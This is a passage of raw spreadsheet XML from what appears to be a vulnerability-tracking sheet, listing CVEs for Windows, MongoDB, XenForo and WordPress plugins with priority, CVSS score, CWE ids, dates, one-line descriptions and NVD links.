s="5" t="inlineStr"><is><t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t></is></c><c r="T854" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t></is></c></row><row r="855"><c r="A855" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B855" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C855" s="5" t="inlineStr"><is><t>CVE-2026-69536</t></is></c><c r="D855" s="5" t="n"><v>7.1</v></c><c r="E855" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F855" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G855" s="5" t="inlineStr" /><c r="H855" s="5" t="n"><v>0.004</v></c><c r="I855" s="5" t="inlineStr" /><c r="J855" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K855" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L855" s="5" t="inlineStr" /><c r="M855" s="5" t="inlineStr" /><c r="N855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O855" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P855" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q855" s="5" t="inlineStr" /><c r="R855" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S855" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T855" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t></is></c></row><row r="856"><c r="A856" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B856" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C856" s="5" t="inlineStr"><is><t>CVE-2026-69553</t></is></c><c r="D856" s="5" t="n"><v>7.1</v></c><c r="E856" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F856" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G856" s="5" t="inlineStr" /><c r="H856" s="5" t="n"><v>0.005</v></c><c r="I856" s="5" t="inlineStr" /><c r="J856" s="5" t="inlineStr" /><c r="K856" s="5" t="inlineStr" /><c r="L856" s="5" t="inlineStr" /><c r="M856" s="5" t="inlineStr" /><c r="N856" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O856" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P856" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q856" s="5" t="inlineStr" /><c r="R856" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S856" s="5" t="inlineStr"><is><t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T856" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t></is></c></row><row r="857"><c r="A857" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B857" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C857" s="5" t="inlineStr"><is><t>CVE-2026-69597</t></is></c><c r="D857" s="5" t="n"><v>7.1</v></c><c r="E857" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F857" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G857" s="5" t="inlineStr" /><c r="H857" s="5" t="n"><v>0.006</v></c><c r="I857" s="5" t="inlineStr" /><c r="J857" s="5" t="inlineStr" /><c r="K857" s="5" t="inlineStr" /><c r="L857" s="5" t="inlineStr" /><c r="M857" s="5" t="inlineStr" /><c r="N857" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O857" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P857" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q857" s="5" t="inlineStr" /><c r="R857" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S857" s="5" t="inlineStr"><is><t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T857" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t></is></c></row><row r="858"><c r="A858" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B858" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C858" s="5" t="inlineStr"><is><t>CVE-2026-69602</t></is></c><c r="D858" s="5" t="n"><v>7.1</v></c><c r="E858" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F858" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G858" s="5" t="inlineStr" /><c r="H858" s="5" t="n"><v>0.006</v></c><c r="I858" s="5" t="inlineStr" /><c r="J858" s="5" t="inlineStr" /><c r="K858" s="5" t="inlineStr" /><c r="L858" s="5" t="inlineStr" /><c r="M858" s="5" t="inlineStr" /><c r="N858" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O858" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P858" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q858" s="5" t="inlineStr" /><c r="R858" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S858" s="5" t="inlineStr"><is><t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T858" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t></is></c></row><row r="859"><c r="A859" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B859" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C859" s="5" t="inlineStr"><is><t>CVE-2026-69688</t></is></c><c r="D859" s="5" t="n"><v>7.1</v></c><c r="E859" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F859" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G859" s="5" t="inlineStr" /><c r="H859" s="5" t="n"><v>0.006</v></c><c r="I859" s="5" t="inlineStr" /><c r="J859" s="5" t="inlineStr" /><c r="K859" s="5" t="inlineStr" /><c r="L859" s="5" t="inlineStr" /><c r="M859" s="5" t="inlineStr" /><c r="N859" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O859" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P859" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q859" s="5" t="inlineStr" /><c r="R859" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S859" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T859" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t></is></c></row><row r="860"><c r="A860" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B860" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C860" s="5" t="inlineStr"><is><t>CVE-2026-69706</t></is></c><c r="D860" s="5" t="n"><v>7.1</v></c><c r="E860" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F860" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G860" s="5" t="inlineStr" /><c r="H860" s="5" t="n"><v>0.004</v></c><c r="I860" s="5" t="inlineStr" /><c r="J860" s="5" t="inlineStr" /><c r="K860" s="5" t="inlineStr" /><c r="L860" s="5" t="inlineStr" /><c r="M860" s="5" t="inlineStr" /><c r="N860" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O860" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P860" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q860" s="5" t="inlineStr" /><c r="R860" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S860" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T860" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t></is></c></row><row r="861"><c r="A861" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B861" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C861" s="5" t="inlineStr"><is><t>CVE-2026-69757</t></is></c><c r="D861" s="5" t="n"><v>7.1</v></c><c r="E861" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F861" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G861" s="5" t="inlineStr" /><c r="H861" s="5" t="n"><v>0.007</v></c><c r="I861" s="5" t="inlineStr" /><c r="J861" s="5" t="inlineStr" /><c r="K861" s="5" t="inlineStr" /><c r="L861" s="5" t="inlineStr" /><c r="M861" s="5" t="inlineStr" /><c r="N861" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O861" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P861" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q861" s="5" t="inlineStr" /><c r="R861" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S861" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T861" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t></is></c></row><row r="862"><c r="A862" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B862" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C862" s="5" t="inlineStr"><is><t>CVE-2026-69761</t></is></c><c r="D862" s="5" t="n"><v>7.1</v></c><c r="E862" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F862" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G862" s="5" t="inlineStr" /><c r="H862" s="5" t="n"><v>0.005</v></c><c r="I862" s="5" t="inlineStr" /><c r="J862" s="5" t="inlineStr" /><c r="K862" s="5" t="inlineStr" /><c r="L862" s="5" t="inlineStr" /><c r="M862" s="5" t="inlineStr" /><c r="N862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O862" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P862" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q862" s="5" t="inlineStr" /><c r="R862" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S862" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T862" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t></is></c></row><row r="863"><c r="A863" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B863" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C863" s="5" t="inlineStr"><is><t>CVE-2026-69775</t></is></c><c r="D863" s="5" t="n"><v>7.1</v></c><c r="E863" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F863" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G863" s="5" t="inlineStr" /><c r="H863" s="5" t="n"><v>0.005</v></c><c r="I863" s="5" t="inlineStr" /><c r="J863" s="5" t="inlineStr" /><c r="K863" s="5" t="inlineStr" /><c r="L863" s="5" t="inlineStr" /><c r="M863" s="5" t="inlineStr" /><c r="N863" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O863" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P863" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q863" s="5" t="inlineStr" /><c r="R863" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S863" s="5" t="inlineStr"><is><t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T863" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t></is></c></row><row r="864"><c r="A864" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B864" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C864" s="5" t="inlineStr"><is><t>CVE-2026-73321</t></is></c><c r="D864" s="5" t="n"><v>7.1</v></c><c r="E864" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F864" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G864" s="5" t="inlineStr" /><c r="H864" s="5" t="n"><v>0.004</v></c><c r="I864" s="5" t="inlineStr" /><c r="J864" s="5" t="inlineStr" /><c r="K864" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L864" s="5" t="inlineStr" /><c r="M864" s="5" t="inlineStr" /><c r="N864" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O864" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P864" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q864" s="5" t="inlineStr" /><c r="R864" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S864" s="5" t="inlineStr"><is><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is></c><c r="T864" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t></is></c></row><row r="865"><c r="A865" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B865" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C865" s="5" t="inlineStr"><is><t>CVE-2026-81781</t></is></c><c r="D865" s="5" t="n"><v>7.1</v></c><c r="E865" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F865" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G865" s="5" t="inlineStr" /><c r="H865" s="5" t="n"><v>0.002</v></c><c r="I865" s="5" t="inlineStr" /><c r="J865" s="5" t="inlineStr" /><c r="K865" s="5" t="inlineStr" /><c r="L865" s="5" t="inlineStr" /><c r="M865" s="5" t="inlineStr" /><c r="N865" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q865" s="5" t="inlineStr" /><c r="R865" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S865" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t></is></c><c r="T865" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t></is></c></row><row r="866"><c r="A866" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B866" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C866" s="5" t="inlineStr"><is><t>CVE-2026-81798</t></is></c><c r="D866" s="5" t="n"><v>7.1</v></c><c r="E866" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F866" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G866" s="5" t="inlineStr" /><c r="H866" s="5" t="n"><v>0.001</v></c><c r="I866" s="5" t="inlineStr" /><c r="J866" s="5" t="inlineStr" /><c r="K866" s="5" t="inlineStr" /><c r="L866" s="5" t="inlineStr" /><c r="M866" s="5" t="inlineStr" /><c r="N866" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q866" s="5" t="inlineStr" /><c r="R866" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S866" s="5" t="inlineStr"><is><t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.

This issue affects Easy Appointments: from n/a through 4.0.2.1.</t></is></c><c r="T866" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t></is></c></row><row r="867"><c r="A867" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B867" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C867" s="5" t="inlineStr"><is><t>CVE-2026-82052</t></is></c><c r="D867" s="5" t="n"><v>7.1</v></c><c r="E867" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F867" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G867" s="5" t="inlineStr" /><c r="H867" s="5" t="n"><v>0.004</v></c><c r="I867" s="5" t="inlineStr" /><c r="J867" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K867" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L867" s="5" t="inlineStr" /><c r="M867" s="5" t="inlineStr" /><c r="N867" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O867" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P867" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q867" s="5" t="inlineStr" /><c r="R867" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S867" s="5" t="inlineStr"><is><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is></c><c r="T867" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t></is></c></row><row r="868"><c r="A868" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B868" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C868" s="5" t="inlineStr"><is><t>CVE-2026-82054</t></is></c><c r="D868" s="5" t="n"><v>7.1</v></c><c r="E868" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F868" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G868" s="5" t="inlineStr" /><c r="H868" s="5" t="n"><v>0.003</v></c><c r="I868" s="5" t="inlineStr" /><c r="J868" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K868" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L868" s="5" t="inlineStr" /><c r="M868" s="5" t="inlineStr" /><c r="N868" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O868" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P868" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q868" s="5" t="inlineStr" /><c r="R868" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S868" s="5" t="inlineStr"><is><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is></c><c r="T868" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t></is></c></row><row r="869"><c r="A869" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B869" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C869" s="5" t="inlineStr"><is><t>CVE-2026-82055</t></is></c><c r="D869" s="5" t="n"><v>7.1</v></c><c r="E869" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F869" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G869" s="5" t="inlineStr" /><c r="H869" s="5" t="n"><v>0.003</v></c><c r="I869" s="5" t="inlineStr" /><c r="J869" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K869" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L869" s="5" t="inlineStr" /><c r="M869" s="5" t="inlineStr" /><c r="N869" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O869" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P869" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q869" s="5" t="inlineStr" /><c r="R869" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S869" s="5" t="inlineStr"><is><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is></c><c r="T869" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t></is></c></row><row r="870"><c r="A870" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B870" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C870" s="5" t="inlineStr"><is><t>CVE-2026-82057</t></is></c><c r="D870" s="5" t="n"><v>7.1</v></c><c r="E870" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F870" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G870" s="5" t="inlineStr" /><c r="H870" s="5" t="n"><v>0.003</v></c><c r="I870" s="5" t="inlineStr" /><c r="J870" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K870" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L870" s="5" t="inlineStr" /><c r="M870" s="5" t="inlineStr" /><c r="N870" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O870" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P870" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q870" s="5" t="inlineStr" /><c r="R870" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S870" s="5" t="inlineStr"><is><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is></c><c r="T870" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t></is></c></row><row r="871"><c r="A871" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B871" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C871" s="5" t="inlineStr"><is><t>CVE-2026-82058</t></is></c><c r="D871" s="5" t="n"><v>7.1</v></c><c r="E871" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F871" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G871" s="5" t="inlineStr" /><c r="H871" s="5" t="n"><v>0.003</v></c><c r="I871" s="5" t="inlineStr" /><c r="J871" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K871" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L871" s="5" t="inlineStr" /><c r="M871" s="5" t="inlineStr" /><c r="N871" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O871" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P871" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q871" s="5" t="inlineStr" /><c r="R871" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S871" s="5" t="inlineStr"><is><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is></c><c r="T871" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t></is></c></row><row r="872"><c r="A872" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B872" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C872" s="5" t="inlineStr"><is><t>CVE-2026-82065</t></is></c><c r="D872" s="5" t="n"><v>7.1</v></c><c r="E872" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F872" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G872" s="5" t="inlineStr" /><c r="H872" s="5" t="n"><v>0.003</v></c><c r="I872" s="5" t="inlineStr" /><c r="J872" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K872" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L872" s="5" t="inlineStr" /><c r="M872" s="5" t="inlineStr" /><c r="N872" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O872" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P872" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q872" s="5" t="inlineStr" /><c r="R872" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S872" s="5" t="inlineStr"><is><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is></c><c r="T872" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t></is></c></row><row r="873"><c r="A873" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B873" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C873" s="5" t="inlineStr"><is><t>CVE-2026-82068</t></is></c><c r="D873" s="5" t="n"><v>7.1</v></c><c r="E873" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F873" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G873" s="5" t="inlineStr" /><c r="H873" s="5" t="n"><v>0.003</v></c><c r="I873" s="5" t="inlineStr" /><c r="J873" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K873" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L873" s="5" t="inlineStr" /><c r="M873" s="5" t="inlineStr" /><c r="N873" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O873" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P873" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q873" s="5" t="inlineStr" /><c r="R873" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S873" s="5" t="inlineStr"><is><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is></c><c r="T873" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t></is></c></row><row r="874"><c r="A874" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B874" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C874" s="5" t="inlineStr"><is><t>CVE-2026-82070</t></is></c><c r="D874" s="5" t="n"><v>7.1</v></c><c r="E874" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F874" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G874" s="5" t="inlineStr" /><c r="H874" s="5" t="n"><v>0.002</v></c><c r="I874" s="5" t="inlineStr" /><c r="J874" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K874" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L874" s="5" t="inlineStr" /><c r="M874" s="5" t="inlineStr" /><c r="N874" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O874" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P874" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q874" s="5" t="inlineStr" /><c r="R874" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S874" s="5" t="inlineStr"><is><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is></c><c r="T874" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t></is></c></row><row r="875"><c r="A875" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B875" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C875" s="5" t="inlineStr"><is><t>CVE-2026-82073</t></is></c><c r="D875" s="5" t="n"><v>7.1</v></c><c r="E875" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F875" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G875" s="5" t="inlineStr" /><c r="H875" s="5" t="n"><v>0.003</v></c><c r="I875" s="5" t="inlineStr" /><c r="J875" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K875" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L875" s="5" t="inlineStr" /><c r="M875" s="5" t="inlineStr" /><c r="N875" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O875" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P875" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q875" s="5" t="inlineStr" /><c r="R875" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S875" s="5" t="inlineStr"><is><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is></c><c r="T875" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t></is></c></row><row r="876"><c r="A876" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B876" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C876" s="5" t="inlineStr"><is><t>CVE-2026-82074</t></is></c><c r="D876" s="5" t="n"><v>7.1</v></c><c r="E876" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F876" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G876" s="5" t="inlineStr" /><c r="H876" s="5" t="n"><v>0.002</v></c><c r="I876" s="5" t="inlineStr" /><c r="J876" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K876" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L876" s="5" t="inlineStr" /><c r="M876" s="5" t="inlineStr" /><c r="N876" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O876" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P876" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q876" s="5" t="inlineStr" /><c r="R876" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S876" s="5" t="inlineStr"><is><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is></c><c r="T876" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t></is></c></row><row r="877"><c r="A877" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B877" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C877" s="5" t="inlineStr"><is><t>CVE-2026-82076</t></is></c><c r="D877" s="5" t="n"><v>7.1</v></c><c r="E877" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F877" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G877" s="5" t="inlineStr" /><c r="H877" s="5" t="n"><v>0.003</v></c><c r="I877" s="5" t="inlineStr" /><c r="J877" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K877" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L877" s="5" t="inlineStr" /><c r="M877" s="5" t="inlineStr" /><c r="N877" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O877" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P877" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q877" s="5" t="inlineStr" /><c r="R877" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S877" s="5" t="inlineStr"><is><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is></c><c r="T877" s="6" 